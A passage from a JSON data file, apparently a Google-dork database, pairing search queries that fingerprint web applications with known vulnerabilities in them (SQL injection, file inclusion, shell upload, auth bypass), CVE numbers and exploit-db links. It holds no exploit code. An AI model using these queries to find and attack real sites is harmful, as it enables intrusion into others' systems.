"request": "\"powered by EQdkp\"", "id": 1548}, {"short description": "intitle:\"Login to Calendar\"", "long description": "ACal 2.2.6 (day.php) Remote File Inclusion Vulnerability - CVE: 2006-2261: http://www.exploit-db.com/exploits/1763", "submited": "2010-11-15", "request": "intitle:\"Login to Calendar\"", "id": 1549}, {"short description": "\"WebCalendar v1.0.4\"", "long description": "WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability - CVE: 2008-2836: http://www.exploit-db.com/exploits/5847", "submited": "2010-11-15", "request": "\"WebCalendar v1.0.4\"", "id": 1550}, {"short description": "inurl:\"com_bfsurvey\"", "long description": "Joomla Component com_bfsurvey LFI Vulnerability - CVE: 2010-2259: http://www.exploit-db.com/exploits/10946", "submited": "2010-11-15", "request": "inurl:\"com_bfsurvey\"", "id": 1551}, {"short description": "anyInventory, the most flexible and powerful web-based inventory system", "long description": "AnyInventory 2.0 (environment.php) Remote File Inclusion Vuln - CVE: 2007-4744: http://www.exploit-db.com/exploits/4365", "submited": "2010-11-15", "request": "anyInventory, the most flexible and powerful web-based inventory system", "id": 1552}, {"short description": "inurl:bemarket", "long description": "BBS E-Market (postscript.php p_mode) Remote File Inclusion Vulnerability - CVE: 2007-3934: http://www.exploit-db.com/exploits/4195", "submited": "2010-11-15", "request": "inurl:bemarket", "id": 1553}, {"short description": "inurl:\"com_jashowcase \"", "long description": "Joomla Component com_jashowcase Directory Traversal - CVE: 2010-0943: http://www.exploit-db.com/exploits/11090", "submited": "2010-11-15", "request": "inurl:\"com_jashowcase \"", "id": 1554}, {"short description": "Powered by React - www.react.nl", "long description": "React software [local file inclusion]: http://www.exploit-db.com/exploits/11943", "submited": "2010-11-15", "request": "Powered by React - www.react.nl", "id": 1555}, {"short description": "\"qjForum\"", "long description": "qjForum (member.asp) SQL Injection Vulnerability - CVE: 2006-2638: http://www.exploit-db.com/exploits/1833", "submited": "2010-11-15", "request": "\"qjForum\"", "id": 1556}, {"short description": "\"Powered by cifshanghai.com\"", "long description": "Cifshanghai (chanpin_info.php) CMS SQL Injection: http://www.exploit-db.com/exploits/10105", "submited": "2010-11-15", "request": "\"Powered by cifshanghai.com\"", "id": 1557}, {"short description": "allinurl:\"detResolucion.php?tipodoc_id=\"", "long description": "CMS Ariadna 2009 SQL Injection - OSVDB-ID: 63929: http://www.exploit-db.com/exploits/12301", "submited": "2010-11-15", "request": "allinurl:\"detResolucion.php?tipodoc_id=\"", "id": 1559}, {"short description": "\"Powered By : Yamamah Version 1.00\"", "long description": "Yamamah Photo Gallery 1.00 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13857", "submited": "2010-11-15", "request": "\"Powered By : Yamamah Version 1.00\"", "id": 1560}, {"short description": "Powered by osCSS", "long description": "osCSS v1.2.1 Database Backups Disclosure: http://www.exploit-db.com/exploits/11612", "submited": "2010-11-15", "request": "Powered by osCSS", "id": 1561}, {"short description": "inurl:\"index.php?option=com_prime\"", "long description": "Joomla Component com_prime Directory Traversal: http://www.exploit-db.com/exploits/11177", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_prime\"", "id": 1562}, {"short description": "\"2006 by www.mani-stats-reader.de.vu\"", "long description": "Mani Stats Reader 1.2 (ipath) Remote File Include Vulnerability - CVE: 2007-1299: http://www.exploit-db.com/exploits/3398", "submited": "2010-11-15", "request": "\"2006 by www.mani-stats-reader.de.vu\"", "id": 1563}, {"short description": "\"powered by: WebLeague\"", "long description": "webLeague 2.2.0 (install.php) Remote Change Password: http://www.exploit-db.com/exploits/9164", "submited": "2010-11-15", "request": "\"powered by: WebLeague\"", "id": 1565}, {"short description": "\"All Rights Reserved. Powered by DieselScripts.com\"", "long description": "Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability - CVE: 2008-4150: http://www.exploit-db.com/exploits/6488", "submited": "2010-11-15", "request": "\"All Rights Reserved. Powered by DieselScripts.com\"", "id": 1567}, {"short description": "intitle:Web Calendar system v 3.40  inurl:.asp", "long description": "Web Calendar System 3.40 (XSS/SQL) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/7265", "submited": "2010-11-15", "request": "intitle:Web Calendar system v 3.40  inurl:.asp", "id": 1569}, {"short description": "inurl:index.php?option=com_noticia", "long description": "Joomla compnent com_noticia cross site scripting: http://www.exploit-db.com/exploits/10789", "submited": "2010-11-15", "request": "inurl:index.php?option=com_noticia", "id": 1570}, {"short description": "inurl:guestbook.php \"Advanced GuestBook\" \"powered by phpbb\"", "long description": "Advanced GuestBook 2.4.0 (phpBB) File Inclusion Vulnerability - CVE: 2006-2152: http://www.exploit-db.com/exploits/1723", "submited": "2010-11-15", "request": "inurl:guestbook.php \"Advanced GuestBook\" \"powered by phpbb\"", "id": 1571}, {"short description": "inurl:index.php?option=com_portfolio", "long description": "Joomla Component com_portfolio Local File Disclosure: http://www.exploit-db.com/exploits/12325", "submited": "2010-11-15", "request": "inurl:index.php?option=com_portfolio", "id": 1573}, {"short description": "allinurl:\"/ubbthreads/\"", "long description": "UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability - CVE: 2006-2568: http://www.exploit-db.com/exploits/1814", "submited": "2010-11-15", "request": "allinurl:\"/ubbthreads/\"", "id": 1574}, {"short description": "\"powered by zomplog\"", "long description": "Zomplog 3.8.2 (force_download.php) File Disclosure Vulnerability: http://www.exploit-db.com/exploits/5636", "submited": "2010-11-15", "request": "\"powered by zomplog\"", "id": 1575}, {"short description": "inurl:\"/cgi-bin/ourspace/\"", "long description": "Ourspace 2.0.9 (uploadmedia.cgi) Remote File Upload Vulnerability - CVE: 2007-4647: http://www.exploit-db.com/exploits/4343", "submited": "2010-11-15", "request": "inurl:\"/cgi-bin/ourspace/\"", "id": 1576}, {"short description": "inurl:index.php?option=com_joomradio", "long description": "Joomla Component com_joomradio SQL injection vulnerability - CVE: 2008-2633: http://www.exploit-db.com/exploits/12400", "submited": "2010-11-15", "request": "inurl:index.php?option=com_joomradio", "id": 1577}, {"short description": "\"Powered by xeCMS\"", "long description": "xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability - CVE: 2007-6508: http://www.exploit-db.com/exploits/4758", "submited": "2010-11-15", "request": "\"Powered by xeCMS\"", "id": 1578}, {"short description": "Power by PHP Classifieds", "long description": "Pre PHP Classifieds SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13992", "submited": "2010-11-15", "request": "Power by PHP Classifieds", "id": 1579}, {"short description": "\"powered by clipshare\"", "long description": "ClipShare 3.0.1 (tid) Remote SQL Injection Vulnerability - CVE: 2008-2793: http://www.exploit-db.com/exploits/5839", "submited": "2010-11-15", "request": "\"powered by clipshare\"", "id": 1580}, {"short description": "inurl:\"com_dailymeals\"", "long description": "Joomla Component com_dailymeals LFI Vulnerability: http://www.exploit-db.com/exploits/10928", "submited": "2010-11-15", "request": "inurl:\"com_dailymeals\"", "id": 1581}, {"short description": "inurl:\"/k12.tr/?part=\"", "long description": "Okul Otomasyon Portal 2.0 Remote SQL Injection Vulnerability - CVE: 2007-5490: http://www.exploit-db.com/exploits/4539", "submited": "2010-11-15", "request": "inurl:\"/k12.tr/?part=\"", "id": 1582}, {"short description": "inurl:\"toplist.php\" \"powered by phpbb\"", "long description": "TopList", "submited": "2010-11-15", "request": "inurl:\"toplist.php\" \"powered by phpbb\"", "id": 1583}, {"short description": "inurl:\"com_clan\"", "long description": "Joomla Component (com_clan) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15454", "submited": "2010-11-15", "request": "inurl:\"com_clan\"", "id": 1584}, {"short description": "\"Powered by WSN Guest\"", "long description": "WSN Guest Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/11344", "submited": "2010-11-15", "request": "\"Powered by WSN Guest\"", "id": 1585}, {"short description": "allinurl: com_paxxgallery \"userid\"", "long description": "Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability - CVE: 2008-0801: http://www.exploit-db.com/exploits/5117", "submited": "2010-11-15", "request": "allinurl: com_paxxgallery \"userid\"", "id": 1586}, {"short description": "inurl:\"index2.php?option=rss\" OR \"powered By Limbo CMS\"", "long description": "Limbo CMS 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability - CVE: 2006-2142: http://www.exploit-db.com/exploits/1729", "submited": "2010-11-15", "request": "inurl:\"index2.php?option=rss\" OR \"powered By Limbo CMS\"", "id": 1588}, {"short description": "\"Powered by ezContents Version 1.4.5\"", "long description": "ezContents 1.4.5 (index.php link) Remote File Disclosure Vulnerability - CVE: 2007-6368: http://www.exploit-db.com/exploits/4694", "submited": "2010-11-15", "request": "\"Powered by ezContents Version 1.4.5\"", "id": 1589}, {"short description": "powered by CMSbright websens", "long description": "CMSbright (id_rub_page) Remote SQL Injection Vulnerability - CVE: 2008-6991: http://www.exploit-db.com/exploits/6343", "submited": "2010-11-15", "request": "powered by CMSbright websens", "id": 1590}, {"short description": "allinurl: com_quiz\"tid\"", "long description": "Joomla Component Quiz 0.81 (tid) SQL Injection Vulnerability - CVE: 2008-0799: http://www.exploit-db.com/exploits/5119", "submited": "2010-11-15", "request": "allinurl: com_quiz\"tid\"", "id": 1591}, {"short description": "inurl:\"com_biographies\"", "long description": "Joomla Component com_biographies SQL injection Vulnerability: http://www.exploit-db.com/exploits/11226", "submited": "2010-11-15", "request": "inurl:\"com_biographies\"", "id": 1592}, {"short description": "inurl\"com_gurujibook\"", "long description": "Joomla Component com_gurujibook SQL injection Vulnerability: http://www.exploit-db.com/exploits/11225", "submited": "2010-11-15", "request": "inurl\"com_gurujibook\"", "id": 1593}, {"short description": "inurl:/system/article/alltopics.php OR inurl:/system/user/index.php", "long description": "OpenPHPNuke 2.3.3 Remote File Inclusion Vulnerability - CVE: 2006-2137: http://www.exploit-db.com/exploits/1727", "submited": "2010-11-15", "request": "inurl:/system/article/alltopics.php OR inurl:/system/user/index.php", "id": 1594}, {"short description": "Realizzato con WSC CMS  by Dynamicsoft", "long description": "WSC CMS (Bypass) SQL Injection Vulnerability - CVE: 2010-0698: http://www.exploit-db.com/exploits/11507", "submited": "2010-11-15", "request": "Realizzato con WSC CMS  by Dynamicsoft", "id": 1595}, {"short description": "\"Powered by Knowledge Base\"", "long description": "Knowledge Base Mod 2.0.2 (phpBB) Remote Inclusion Vulnerability - CVE: 2006-2134: http://www.exploit-db.com/exploits/1728", "submited": "2010-11-15", "request": "\"Powered by Knowledge Base\"", "id": 1596}, {"short description": "allinurl:\"com_extcalendar\"", "long description": "Joomla Component com_extcalendar Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14694", "submited": "2010-11-15", "request": "allinurl:\"com_extcalendar\"", "id": 1597}, {"short description": "intitle:\"Jax Formmailer - Administration\"", "long description": "Jax FormMailer 3.0.0 Remote File Inclusion Vulnerability - CVE: 2009-2378: http://www.exploit-db.com/exploits/9051", "submited": "2010-11-15", "request": "intitle:\"Jax Formmailer - Administration\"", "id": 1598}, {"short description": "Powered by: Linkarity", "long description": "Linkarity (link.php) Remote SQL Injection Vulnerability - CVE: 2008-4353: http://www.exploit-db.com/exploits/6455", "submited": "2010-11-15", "request": "Powered by: Linkarity", "id": 1599}, {"short description": "inurl:index.php?option=com_yanc", "long description": "Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability - CVE: 2007-2792: http://www.exploit-db.com/exploits/3944", "submited": "2010-11-15", "request": "inurl:index.php?option=com_yanc", "id": 1600}, {"short description": "allinurl: \"index.php?p=gallerypic img_id\"", "long description": "Koobi Pro v6.1 gallery (img_id) - CVE: 2008-6210: http://www.exploit-db.com/exploits/10751", "submited": "2010-11-15", "request": "allinurl: \"index.php?p=gallerypic img_id\"", "id": 1602}, {"short description": "inurl:classified.php phpbazar", "long description": "phpBazar 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities - CVE: 2006-2527: http://www.exploit-db.com/exploits/1804", "submited": "2010-11-15", "request": "inurl:classified.php phpbazar", "id": 1603}, {"short description": "intext:\"Powered by Firebrand Technologies\"", "long description": "CMS Firebrand Tec Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/12378", "submited": "2010-11-15", "request": "intext:\"Powered by Firebrand Technologies\"", "id": 1605}, {"short description": "\"Designed and Developed by Debliteck Ltd\"", "long description": "DB[CMS] Sql Injection Vulnerability: http://www.exploit-db.com/exploits/12654", "submited": "2010-11-15", "request": "\"Designed and Developed by Debliteck Ltd\"", "id": 1606}, {"short description": "\"Designed and Developed by Debliteck Ltd\"", "long description": "DB[CMS] (section.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12659", "submited": "2010-11-15", "request": "\"Designed and Developed by Debliteck Ltd\"", "id": 1608}, {"short description": "Supernews 2.6", "long description": "Supernews 2.6 (index.php noticia) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8869", "submited": "2010-11-15", "request": "Supernews 2.6", "id": 1609}, {"short description": "\"powered by ezUserManager\"", "long description": "ezUserManager 1.6 Remote File Inclusion Vulnerability - CVE: 2006-2424: http://www.exploit-db.com/exploits/1795", "submited": "2010-11-15", "request": "\"powered by ezUserManager\"", "id": 1610}, {"short description": "Powered by: PreProjects", "long description": "Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13996", "submited": "2010-11-15", "request": "Powered by: PreProjects", "id": 1611}, {"short description": "allintitle: \"MCgallery 0.5b\"", "long description": "McGallery 0.5b (download.php) Arbitrary File Download Vulnerability - CVE: 2007-1478: http://www.exploit-db.com/exploits/3494", "submited": "2010-11-15", "request": "allintitle: \"MCgallery 0.5b\"", "id": 1612}, {"short description": "TRUC 0.11.0 :: 2006 by ASDIS :", "long description": "RUC 0.11.0 (download.php) Remote File Disclosure Vulnerability - CVE: 2008-0814: http://www.exploit-db.com/exploits/5129", "submited": "2010-11-15", "request": "TRUC 0.11.0 :: 2006 by ASDIS :", "id": 1613}, {"short description": "contact_frm.php", "long description": "Recipes Website 1.0 SQL Injection - OSVDB-ID: 64841: http://www.exploit-db.com/exploits/12703", "submited": "2010-11-15", "request": "contact_frm.php", "id": 1614}, {"short description": "Powered by Natterchat v1.12", "long description": "Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2008-7049: http://www.exploit-db.com/exploits/7175", "submited": "2010-11-15", "request": "Powered by Natterchat v1.12", "id": 1615}, {"short description": "\"Instant Free File Uploader\"", "long description": "Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10241", "submited": "2010-11-15", "request": "\"Instant Free File Uploader\"", "id": 1616}, {"short description": "Powered by Webiz inurl:'wmt/webpages'", "long description": "(Webiz) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12798", "submited": "2010-11-15", "request": "Powered by Webiz inurl:&#039;wmt/webpages", "id": 1618}, {"short description": "\"Powered by xchangeboard\"", "long description": "XchangeBoard 1.70 (boardID) Remote SQL Injection Vulnerability - CVE: 2008-3035: http://www.exploit-db.com/exploits/5991", "submited": "2010-11-15", "request": "\"Powered by xchangeboard\"", "id": 1619}, {"short description": "allinurl: com_mcquiz \"tid\"", "long description": "Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability - CVE: 2008-0800: http://www.exploit-db.com/exploits/5118", "submited": "2010-11-15", "request": "allinurl: com_mcquiz \"tid\"", "id": 1620}, {"short description": "inurl:\"com_productbook\"", "long description": "Joomla Component com_productbook SQL Injection Vulnerability - CVE: 2010-1045: http://www.exploit-db.com/exploits/11352", "submited": "2010-11-15", "request": "inurl:\"com_productbook\"", "id": 1622}, {"short description": "inurl: \"com_alphacontent\"", "long description": "Joomla Component alphacontent 2.5.8 (id) SQL Injection Vulnerability - CVE: 2008-1559: http://www.exploit-db.com/exploits/5310", "submited": "2010-11-15", "request": "inurl: \"com_alphacontent\"", "id": 1623}, {"short description": "\"Powered by: PreProjects\"", "long description": "Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13987", "submited": "2010-11-15", "request": "\"Powered by: PreProjects\"", "id": 1624}, {"short description": "\"Powered by SoftbizScripts\" inurl:store_info.php", "long description": "Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability - CVE: 2007-5122: http://www.exploit-db.com/exploits/4457", "submited": "2010-11-15", "request": "\"Powered by SoftbizScripts\" inurl:store_info.php", "id": 1625}, {"short description": "inurl:\"com_avosbillets\"", "long description": "Joomla (com_avosbillets) SQL injection Vulnerability: http://www.exploit-db.com/exploits/11223", "submited": "2010-11-15", "request": "inurl:\"com_avosbillets\"", "id": 1626}, {"short description": "\"Powered By Aardvark Topsites PHP 4.2.2\"", "long description": "Aardvark Topsites PHP 4.2.2 (path) Remote File Inclusion Vuln - CVE: 2006-7026: http://www.exploit-db.com/exploits/1730", "submited": "2010-11-15", "request": "\"Powered By Aardvark Topsites PHP 4.2.2\"", "id": 1628}, {"short description": "inurl:\"com_projectfork\"", "long description": "Joomla Component com_Projectfork 2.0.10 Local File Inclusion Vuln - CVE: 2009-2100: http://www.exploit-db.com/exploits/8946", "submited": "2010-11-15", "request": "inurl:\"com_projectfork\"", "id": 1629}, {"short description": "intext:\"Powered by PHPCityPortal.com\"", "long description": "PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2009-4870: http://www.exploit-db.com/exploits/9395", "submited": "2010-11-15", "request": "intext:\"Powered by PHPCityPortal.com\"", "id": 1630}, {"short description": "intitle:\"jGallery\"", "long description": "jGallery 1.3 (index.php) Remote File Inclusion Vulnerability - CVE: 2007-2158: http://www.exploit-db.com/exploits/3760", "submited": "2010-11-15", "request": "intitle:\"jGallery\"", "id": 1631}, {"short description": "\"Powered by Download 3000\"", "long description": "Joomla Component d3000 1.0.0 Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5299", "submited": "2010-11-15", "request": "\"Powered by Download 3000\"", "id": 1633}, {"short description": "intitle:\"zFeeder admin panel\"", "long description": "zFeeder 1.6 (admin.php) No Authentication Vulnerability - CVE: 2009-0807: http://www.exploit-db.com/exploits/8092", "submited": "2010-11-15", "request": "intitle:\"zFeeder admin panel\"", "id": 1634}, {"short description": "Powered by WebStudio", "long description": "WebStudio CMS (pageid) Remote Blind SQL Injection Vuln - CVE: 2008-5336: http://www.exploit-db.com/exploits/7236", "submited": "2010-11-15", "request": "Powered by WebStudio", "id": 1635}, {"short description": "inurl:\"select_file2.php\"", "long description": "Flashden Multiple File Uploader Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10236", "submited": "2010-11-15", "request": "inurl:\"select_file2.php\"", "id": 1636}, {"short description": "\"powered by Gradman\"", "long description": "Gradman 0.1.3 (info.php tabla) Local File Inclusion Vulnerability - CVE: 2008-0393: http://www.exploit-db.com/exploits/4936", "submited": "2010-11-15", "request": "\"powered by Gradman\"", "id": 1638}, {"short description": "\"Designed and Developed by Debliteck Ltd\"", "long description": "DB[CMS] (article.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12666", "submited": "2010-11-15", "request": "\"Designed and Developed by Debliteck Ltd\"", "id": 1639}, {"short description": "\"Powered by mlffat\"", "long description": "Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8674", "submited": "2010-11-15", "request": "\"Powered by mlffat\"", "id": 1640}, {"short description": "inurl:\"/squirrelcart/\" -squirrelcart.com", "long description": "Squirrelcart 1.x.x (cart.php) Remote File Inclusion Vulnerability - CVE: 2007-4439: http://www.exploit-db.com/exploits/4295", "submited": "2010-11-15", "request": "inurl:\"/squirrelcart/\" -squirrelcart.com", "id": 1641}, {"short description": "Engine powered by easyLink V1.1.0.", "long description": "easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability - CVE: 2008-6471: http://www.exploit-db.com/exploits/6494", "submited": "2010-11-15", "request": "Engine powered by easyLink V1.1.0.", "id": 1642}, {"short description": "allintext: \"This site is powered by IndexScript\"", "long description": "IndexScript 2.8 (show_cat.php cat_id) SQL Injection Vulnerability - CVE: 2007-4069: http://www.exploit-db.com/exploits/4225", "submited": "2010-11-15", "request": "allintext: \"This site is powered by IndexScript\"", "id": 1643}, {"short description": "2005 Ocean12 Technologies. All rights reserved", "long description": "Ocean12 Membership Manager Pro Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7245", "submited": "2010-11-15", "request": "2005 Ocean12 Technologies. All rights reserved", "id": 1644}, {"short description": "\"powered by PassWiki\"", "long description": "PassWiki 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability - CVE: 2008-6423: http://www.exploit-db.com/exploits/5704", "submited": "2010-11-15", "request": "\"powered by PassWiki\"", "id": 1646}, {"short description": "\"software 2004-2005 by randshop\"", "long description": "Randshop 1.1.1 (header.inc.php) Remote File Include Vulnerability - CVE: 2006-3375: http://www.exploit-db.com/exploits/1971", "submited": "2010-11-15", "request": "\"software 2004-2005 by randshop\"", "id": 1647}, {"short description": "\"powered by phpEmployment\"", "long description": "phpEmployment (php upload) Arbitrary File Upload Vulnerability - CVE: 2008-6920: http://www.exploit-db.com/exploits/7563", "submited": "2010-11-15", "request": "\"powered by phpEmployment\"", "id": 1648}, {"short description": "inurl:\"wp-download.php?dl_id=\"", "long description": "Wordpress Plugin Download (dl_id) SQL Injection Vulnerability - CVE: 2008-1646: http://www.exploit-db.com/exploits/5326", "submited": "2010-11-15", "request": "inurl:\"wp-download.php?dl_id=\"", "id": 1649}, {"short description": "\"2004 PHPKick.de Version 0.8\"", "long description": "PHPKick v0.8 statistics.php SQL Injection - CVE: 2010-3029: http://www.exploit-db.com/exploits/14578", "submited": "2010-11-15", "request": "\" 2004 PHPKick.de Version 0.8\"", "id": 1651}, {"short description": "\"Powered by VS PANEL\"", "long description": "VS PANEL 7.3.6 (Cat_ID) Remote SQL Injection Vulnerability - CVE: 2009-3590: http://www.exploit-db.com/exploits/8506", "submited": "2010-11-15", "request": "\"Powered by VS PANEL\"", "id": 1652}, {"short description": "\"powered by phpmydirectory\" OR intext:\"2001-2006 phpMyDirectory.com\"", "long description": "phpMyDirectory 10.4.4 (ROOT_PATH) Remote Inclusion Vulnerability - CVE: 2006-2521: http://www.exploit-db.com/exploits/1808", "submited": "2010-11-15", "request": "\"powered by phpmydirectory\" OR intext:\"2001-2006 phpMyDirectory.com\"", "id": 1653}, {"short description": "intext:\"Kalimat news system v 1.0\"", "long description": "kalimat new system v 1.0 (index.php) SQL Injection: http://www.exploit-db.com/exploits/11563", "submited": "2010-11-15", "request": "intext:\"Kalimat news system v 1.0\"", "id": 1654}, {"short description": "Powered by: PhotoPost PHP 4.6", "long description": "PhotoPost PHP SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14446", "submited": "2010-11-15", "request": "Powered by: PhotoPost PHP 4.6", "id": 1655}, {"short description": "\"Powered by Maian Recipe v1.0\"", "long description": "Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability - CVE: 2007-0848: http://www.exploit-db.com/exploits/3284", "submited": "2010-11-15", "request": "\"Powered by Maian Recipe v1.0\"", "id": 1656}, {"short description": "\"Powered by CommonSense CMS\"", "long description": "CommonSense CMS Sql Injection Vulnerability: http://www.exploit-db.com/exploits/13762", "submited": "2010-11-15", "request": "\"Powered by CommonSense CMS\"", "id": 1657}, {"short description": "\"Eyeland Studio Inc. All Rights Reserved.\" inurl:game.php", "long description": "Eyeland Studio Inc. (game.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13858", "submited": "2010-11-15", "request": "\"Eyeland Studio Inc. All Rights Reserved.\" inurl:game.php", "id": 1658}, {"short description": "\"powered by Pagetool\"", "long description": "Pagetool 1.07 (news_id) Remote SQL Injection Vulnerability - CVE: 2007-3402: http://www.exploit-db.com/exploits/4107", "submited": "2010-11-15", "request": "\"powered by Pagetool\"", "id": 1659}, {"short description": "powered by jshop", "long description": "Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability - CVE: 2007-0232: http://www.exploit-db.com/exploits/3113", "submited": "2010-11-15", "request": "powered by jshop", "id": 1660}, {"short description": "/modules/mx_links/", "long description": "mxBB Module WebLinks 2.05 Remote Inclusion Vulnerability - CVE: 2006-6645: http://www.exploit-db.com/exploits/2939", "submited": "2010-11-15", "request": "/modules/mx_links/", "id": 1661}, {"short description": "inurl:\"?pageNum_RSnews\"&amp;view", "long description": "NUs Newssystem v1.02 (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11674", "submited": "2010-11-15", "request": "inurl:\"?pageNum_RSnews\"&amp;view", "id": 1662}, {"short description": "inurl:index.php?option=com_directory", "long description": "Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability - CVE: 2008-0690: http://www.exploit-db.com/exploits/5047", "submited": "2010-11-15", "request": "inurl:index.php?option=com_directory", "id": 1663}, {"short description": "\"Powered By DynamicPAD\"", "long description": "DynamicPAD 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities - CVE: 2007-2527: http://www.exploit-db.com/exploits/3868", "submited": "2010-11-15", "request": "\"Powered By DynamicPAD\"", "id": 1664}, {"short description": "\"Powered by : elkagroup.com\"", "long description": "elkagroup (pid ) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10836", "submited": "2010-11-15", "request": "\"Powered by : elkagroup.com\"", "id": 1666}, {"short description": "\"com_joom12pic\"", "long description": "Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability - CVE: 2007-4954: http://www.exploit-db.com/exploits/4416", "submited": "2010-11-15", "request": "\"com_joom12pic\"", "id": 1667}, {"short description": "\"Starting bid\" \"Powered by SoftbizScripts\"", "long description": "Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln - CVE: 2007-5999: http://www.exploit-db.com/exploits/4617", "submited": "2010-11-15", "request": "\"Starting bid\" \"Powered by SoftbizScripts\"", "id": 1668}, {"short description": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license", "long description": "Liberum Help Desk 0.97.3 (details.asp) SQL Injection Vulnerability - CVE: 2006-6160: http://www.exploit-db.com/exploits/2846", "submited": "2010-11-15", "request": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license", "id": 1669}, {"short description": "allinurl:\"jokes.php?catagorie=\"", "long description": "Jokes Site Script (jokes.php?catagorie) SQL Injection Vulnerability - CVE: 2008-2065: http://www.exploit-db.com/exploits/5508", "submited": "2010-11-15", "request": "allinurl:\"jokes.php?catagorie=\"", "id": 1670}, {"short description": "\"Created by weenCompany\"", "long description": "weenCompany SQL Injection Vulnerability - CVE: 2009-4423: http://www.exploit-db.com/exploits/10606", "submited": "2010-11-15", "request": "\"Created by weenCompany\"", "id": 1671}, {"short description": "intext:\"Powered by eStore v1.0.2\"", "long description": "eStore v1.0.2 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10784", "submited": "2010-11-15", "request": "intext:\"Powered by eStore v1.0.2\"", "id": 1672}, {"short description": "\"Powered by: Elite Gaming Ladders v3.2\"", "long description": "Elite Gaming Ladders 3.2 (platform) SQL Injection Vulnerability - CVE: 2009-3314: http://www.exploit-db.com/exploits/9702", "submited": "2010-11-15", "request": "\"Powered by: Elite Gaming Ladders v3.2\"", "id": 1673}, {"short description": "php-addressbook v3.1.5", "long description": "php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10877", "submited": "2010-11-15", "request": "php-addressbook v3.1.5", "id": 1674}, {"short description": "\"Powered by ParsBlogger\"", "long description": "ParsBlogger (blog.asp wr) Remote SQL Injection Vulnerability - CVE: 2008-5637: http://www.exploit-db.com/exploits/7239", "submited": "2010-11-15", "request": "\"Powered by ParsBlogger\"", "id": 1676}, {"short description": "intitle:\"vrnews v1\"", "long description": "VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability - CVE: 2007-3611: http://www.exploit-db.com/exploits/4150", "submited": "2010-11-15", "request": "intitle:\"vrnews v1\"", "id": 1677}, {"short description": "inurl:\"customer_testimonials.php\"", "long description": "osCommerce Addon Customer Testimonials 3.1 SQL Injection Vulnerability - CVE: 2008-0719: http://www.exploit-db.com/exploits/5075", "submited": "2010-11-15", "request": "inurl:\"customer_testimonials.php\"", "id": 1678}, {"short description": "\"Powered by Espinas IT\"", "long description": "Espinas CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12100", "submited": "2010-11-15", "request": "\"Powered by Espinas IT\"", "id": 1679}, {"short description": "\"Powered by iNetScripts\"", "long description": "Powered by iNetScripts: Shell Upload Vulnerability: http://www.exploit-db.com/exploits/12384", "submited": "2010-11-15", "request": "\"Powered by iNetScripts\"", "id": 1681}, {"short description": "Maintained with the Ocean12 Poll Manager Pro v1.00", "long description": "Ocean12 Poll Manager Pro Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7246", "submited": "2010-11-15", "request": "Maintained with the Ocean12 Poll Manager Pro v1.00", "id": 1682}, {"short description": "allinurl: \"com_glossary\"", "long description": "Mambo Component Glossary 2.0 (catid) SQL Injection Vulnerability - CVE: 2008-0514: http://www.exploit-db.com/exploits/5010", "submited": "2010-11-15", "request": "allinurl: \"com_glossary\"", "id": 1683}, {"short description": "\"2009 Azimut Technologie\"", "long description": "Azimut Technologie Admin Login Bypass vulnerability: http://www.exploit-db.com/exploits/12695", "submited": "2010-11-15", "request": "\"2009 Azimut Technologie\"", "id": 1684}, {"short description": "inurl:buyer/about_us.php?BuyerID", "long description": "Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12612", "submited": "2010-11-15", "request": "inurl:buyer/about_us.php?BuyerID", "id": 1685}, {"short description": "Maintained with the Ocean12 Calendar Manager Gold v2.04", "long description": "Ocean12 Calendar Manager Gold Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7247", "submited": "2010-11-15", "request": 